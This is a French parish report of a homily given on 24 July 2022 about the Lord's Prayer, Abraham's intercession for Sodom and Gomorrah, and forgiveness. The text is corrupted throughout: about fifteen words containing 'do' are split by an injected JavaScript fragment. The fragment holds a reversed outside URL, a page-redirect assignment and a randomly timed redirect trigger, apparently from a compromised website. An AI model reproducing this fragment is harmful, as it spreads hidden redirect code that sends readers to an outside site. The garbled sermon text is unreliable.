La sainte Messe du 24 juillet 2022 a été présidée par le Père Japhet Simbizi. La Chorale Sainte Famille a aidé dans l’animation du chant liturgique ; et les lectures du jour ont été respectivement tirées du Livre de la Genèse (18, 20-32), de l’épitre de saint Paul aux Colossiens (2, 12-14), et l’Évangile selon Saint Luc (11, 1-13).

Après la lecture de textes proposés pour le jour, le Père SIMBIZI a procédé à prêcher son homélie dans laquelle il est en grande partie revenu sur la prière que Jésus a apprise à ses disciples, le Notre Père. ‘Chers frères et sœurs, sachons les caractéristiques de notre Père pour mieux l’atoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dorer’, a introduit le Père Japhet. Jésus a d’abord appris à ses disciples une prière qui nous montre que nous sommes tous des enfants issus du même Père et que nous avons toujours besoin les uns des autres dans la vie de tous les jours. Un toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}don que Dieu gratifie à l’un aide l’autre qui a reçu un toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}don différent mais complémentaire au premier. Abraham a senti que la punition divine allait tomber sur les villes de Sotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dome et Gomor et il est allé plaider leur cause auprès de Dieu afin de leur obtenir le partoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}don. C’est par amour et compassion pour tous les hommes qui habitaient ces villes qu’Abraham a plaidé pour eux.

Une seule personne animée de bonne foi dans une ville d’un million de personnes perverses, c’est comme rien au niveau du calcul mathématique, mais c’est différent au niveau de la foi. Nous savons que le sang du seul Fils de Dieu nous a tous sauvés. Voilà en fait le fondement que nous attribuons à la supplication d’Abraham en faveur des deux villes ci-haut citées. En plus, la Reine Esther a plaidé pour la cause du peuple d’Israël et lui a obtenu gain de cause alors que toute la population allait être tuée par le roi. Dans cette église où nous nous trouvons assis, notre joie est que nous sommes à côté d’autres personnes. Comme se sentirait-on si on était unique en tout ce lieu ?

Dans l’Evangile, Jésus a appris à ses disciples à prier. Dans cette prière, nous nous adressons à un seul Père et nous sentons que nous sommes tous enfants et héritiers au même titre devant Dieu. En disant ‘Que ton règne vienne’, nous reconnaissons que seul Dieu peut étendre son règne en nous si nous lui obéissons. Notre toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}docilité envers lui fera que sa volonté pour nous soit effective ici sur terre comme il en est le cas au ciel. Ceci parce que Dieu veut toujours changer la face de la terre pour qu’elle redevienne comme l’ancien paradis que décrit les Saintes Ecritures.

‘Donne-nous notre pain de ce jour’

Nous demantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dons à Dieu ce qui nous suffit pour ce jour afin que nos soucis ne nous égarent pas loin à penser à notre avenir en oubliant Dieu qui est en même temps source de notre vie et sûreté pour notre avenir. Ne remettons pas à demain ce qu’on peut faire aujourd’hui, car Dieu seul sait ce que sera notre avenir. Ceci est d’autant plus évident que même Abraham a supplié le Bon Dieu en reconnaissant que le fils de l’homme n’est que poussière et sa vie se fane comme une fleur sous le soleil. Notre vie est comparable à un voyage en bus : chaque personne sort du bus quand elle arrive à destination, et cela ne toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doit pas entraver les autres de continuer, chacun jusqu’à destination.

Le roi Ezéchias a reçu un délai de grâce de quinze ans alors qu’il avait été averti de la fin de sa vie terrestre. Mais on ne sait pas s’il a vécu toutes ces années supplémentaires dans la joie. La vie a tant de temps de faiblesse et de souffrance qu’on ne peut s’imaginer une vie sans fatigue ni difficultés de quelque nature que ce soit. Comme il en est ainsi, nous devons nous en remettre à Dieu qui est le seul garant de notre vie présente comme de l’avenir.

Pour obtenir le partoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}don de Dieu, une seule condition est posée pour nous : partoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donner aux autres qui nous ont offensés. Nous n’avons même pas aucune raison de vouloir du mal à notre prochain, car ce serait une façon de l’offenser et de ne pas lui partoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donner. Dire qu’un pays est pauvre ne signifie pas que tous les habitants de ce pays sont pauvres car il y a toujours des gens riches. Dieu demande que ceux qui ont plus toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donnent à ceux qui en ont peu ou pas du tout. C’est en substance ce que veut dire être frère et sœur pour l’autre. Dans tout ce que nous faisons, ne pensons pas à forcer Dieu, laissons-nous plutôt guider par sa volonté miséricordieuse. Ne brûlons pas les étapes, soyons patients dans la vie pour ne pas nous cogner contre le mur. Avoir en mains des outils sans savoir comment les utiliser est aussi un échec. Abraham a été patient et ceci lui a valu la faveur de Dieu. Nous devons aussi patienter et persévérer dans la prière et Dieu nous exaucera à temps voulu.

NYANDWI M.